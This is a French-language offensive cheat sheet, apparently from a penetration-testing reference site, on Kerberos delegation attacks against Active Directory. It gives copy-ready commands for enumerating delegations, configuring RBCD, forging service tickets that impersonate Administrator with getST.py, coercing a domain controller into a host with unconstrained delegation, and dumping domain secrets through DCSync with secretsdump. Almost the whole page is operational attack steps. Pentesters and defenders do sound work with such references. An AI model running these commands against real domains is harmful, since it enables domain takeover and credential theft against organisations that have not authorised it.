0xbbuddha0xbbuddha

Exploitation

Delegation Attacks

Unconstrained, constrained et RBCD : détecter, configurer et exploiter les chemins de délégation.

Enumération

Copy command
nxc ldap $DC -u $USER -p $PASS --trusted-for-delegation

Description: Identifier les comptes et machines avec délégation unconstrained.

Copy command
nxc ldap $DC -u $USER -p $PASS --find-delegation

Description: Cartographier toutes les délégations : unconstrained, constrained et RBCD.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --attr msDS-AllowedToDelegateTo

Description: Lister les services cibles pour la délégation constrained de chaque compte.

Copy command
gf ldap -t $DC -u $USER -p $PASS --rbcd

Description: Détecter rapidement les objets exposés au RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity).

RBCD

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$DELEGATE_TO$' '$DELEGATE_FROM$'

Description: Configurer le RBCD : $DELEGATE_TO$ reçoit la confiance de $DELEGATE_FROM$.

Copy command
getST.py -spn cifs/$TARGET.$DOMAIN -impersonate Administrator -dc-ip $DC $DOMAIN/$DELEGATE_FROM$:$PASS

Description: S4U2Proxy : générer un ST impersonant Administrator vers le service cible.

Copy command
export KRB5CCNAME=Administrator@cifs_$TARGET.ccache

Description: Activer le ticket résultant pour les outils impacket et nxc.

Copy command
nxc smb $TARGET -u Administrator -p '' --use-kcache

Description: Utiliser le ticket RBCD pour accéder à la machine cible en tant qu'Administrator.

Délégation Constrained

Copy command
getST.py -spn $SPN -impersonate Administrator -dc-ip $DC $DOMAIN/$SERVICE_USER:$PASS

Description: S4U2Self + S4U2Proxy depuis un compte avec constrained delegation configurée.

Copy command
getST.py -k -no-pass -spn $SPN -impersonate Administrator $DOMAIN/$SERVICE_USER$

Description: Même attaque depuis un compte machine (TGT requis via getTGT.py d'abord).

Copy command
getST.py -spn $SPN -impersonate Administrator -dc-ip $DC -additional-ticket administrator.ccache $DOMAIN/$USER:$PASS

Description: Constrained delegation avec ticket supplémentaire si protocole transition requis.

Unconstrained Delegation

Copy command
coercer coerce -u $USER -p $PASS -d $DOMAIN -t $DC -l $COMPROMISED_HOST

Description: Coercer le DC vers la machine compromise (unconstrained) : son TGT arrive en mémoire.

Copy command
secretsdump.py $DOMAIN/$LOCAL_ADMIN:$PASS@$COMPROMISED_HOST -just-dc

Description: Depuis la machine compromise avec TGT DC en mémoire : DCSync immédiat.